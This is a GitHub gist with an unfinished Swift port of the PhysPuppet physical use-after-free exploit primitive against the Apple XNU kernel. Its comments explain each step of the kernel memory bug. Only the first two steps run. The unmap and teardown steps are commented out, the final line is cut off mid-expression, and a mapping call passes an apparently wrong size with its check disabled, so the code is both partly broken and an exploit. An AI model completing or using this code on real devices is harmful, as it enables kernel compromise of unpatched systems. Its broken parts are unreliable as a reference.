Skip to content

Instantly share code, notes, and snippets.

@JJTech0130
Created February 17, 2024 03:29
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save JJTech0130/846b92cb0d9bb195f090bfacefd6d8b4 to your computer and use it in GitHub Desktop.
Save JJTech0130/846b92cb0d9bb195f090bfacefd6d8b4 to your computer and use it in GitHub Desktop.
An attempt at a pure-Swift port of https://github.com/felix-pb/kfd/blob/main/kfd/libkfd/puaf/physpuppet.h (the PhysPuppet PUAF primitive).
import Foundation
// MARK: - PhysPuppet constants (mirroring the macros in kfd's physpuppet.h)

/// Bytes in one ARM page (4 KiB).
let ARM_PGBYTES: UInt64 = 4096

/// Size of the vm_named_entry: two pages plus one byte
/// (rounds up to a 3-page vm_object in the kernel).
let physpuppet_vmne_size: UInt64 = 1 + 2 * ARM_PGBYTES

/// Offset of the vm_map_entry into its backing object: exactly one page.
/// (`UInt` because the Swift `vm_map` binding takes `vm_offset_t`.)
let physpuppet_vme_offset = UInt(ARM_PGBYTES)

/// Span of the vm_map_entry: exactly two pages.
let physpuppet_vme_size = UInt(2 * ARM_PGBYTES)
/// Swift-callable stand-in for the `mach_task_self()` C macro, which is not
/// imported into Swift; it simply reads the cached task port `mach_task_self_`.
func mach_task_self() -> task_t {
    mach_task_self_
}
/// Attempts the PhysPuppet physical use-after-free (PUAF) setup, once per page.
/// Work-in-progress Swift port of kfd's physpuppet exploit: steps 3-5 below are
/// still commented out, so each loop iteration currently performs only steps
/// 1-2 (create the named entry and map it) and prints the `vm_map` result.
/// NOTE(review): the name is missing a "y" ("phspuppet" vs. "physpuppet");
/// kept as-is so any existing callers keep working.
///
/// - Parameter puaf_pages: number of PUAF pages to attempt (one loop pass each).
func phspuppet_run(puaf_pages: UInt) {
    print("Trying PhysPuppet exploit...")
    for i in 0..<puaf_pages {
        print("Page \(i) of \(puaf_pages)...")
        /*
         * STEP 1:
         *
         * Create a vm_named_entry. It will be backed by a vm_object with a
         * vo_size of 3 pages and an initial ref_count of 1.
         */
        var named_entry: mach_port_t = 0
        let ret = mach_memory_object_memory_entry_64(mach_host_self(), 1, physpuppet_vmne_size, VM_PROT_DEFAULT, MEMORY_OBJECT_NULL, &named_entry)
        assert (ret == KERN_SUCCESS)
        /*
         * STEP 2:
         *
         * Map the vm_named_entry into our vm_map. This will create a
         * vm_map_entry with a vme_start that is page-aligned, but a vme_end
         * that is not (vme_end = vme_start + 1 page + 1 byte). The new
         * vm_map_entry's vme_object is shared with the vm_named_entry, and
         * therefore its ref_count goes up to 2. Finally, the new vm_map_entry's
         * vme_offset is 1 page.
         */
        var address: vm_address_t = 0
        print(mach_task_self())
        // NOTE(review): the size argument here is UInt.max — verify against the
        // C original (physpuppet.h), which may pass a different size. The
        // success assert below is disabled, so a failing vm_map is only printed.
        let ret2 = vm_map(mach_task_self(), &address, UInt.max, 0, VM_FLAGS_ANYWHERE | VM_FLAGS_RANDOM_ADDR, named_entry, physpuppet_vme_offset, 0, VM_PROT_DEFAULT, VM_PROT_DEFAULT, VM_INHERIT_DEFAULT)
        print(ret2)
        // assert (ret2 == KERN_SUCCESS)
        /*
         * STEP 3 (currently disabled in this port):
         *
         * Fault in both pages covered by the vm_map_entry. This will populate
         * the second and third vm_pages (by vmp_offset) of the vm_object. Most
         * importantly, this will set the two L3 PTEs covered by that virtual
         * address range with read and write permissions.
         */
        // memset(UnsafeMutableRawPointer(bitPattern: address), 65, Int(physpuppet_vme_size))
        /*
         * STEP 4 (currently disabled in this port):
         *
         * Unmap that virtual address range. Crucially, when vm_map_delete()
         * calls pmap_remove_options(), only the first L3 PTE gets cleared. The
         * vm_map_entry is deallocated and therefore the vm_object's ref_count
         * goes down to 1.
         */
        // let ret3 = vm_deallocate(mach_task_self(), address, physpuppet_vme_size)
        // assert (ret3 == KERN_SUCCESS)
        /*
         * STEP 5 (currently disabled in this port):
         *
         * Destroy the vm_named_entry. The vm_object's ref_count drops to 0 and
         * therefore is reaped. This will put all of its vm_pages on the free
         * list without calling pmap_disconnect().
         */
        // let ret4 = mach_port_deallocate(mach_task_self(), named_entry)
        // NOTE(review): the line below looks truncated mid-expression
        // ("address + ph..."); in the C original this records the PUAF page's
        // user address into the kfd bookkeeping struct — confirm before enabling.
        //kfd->puaf.puaf_pages_uaddr[i] = address + ph
    }
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment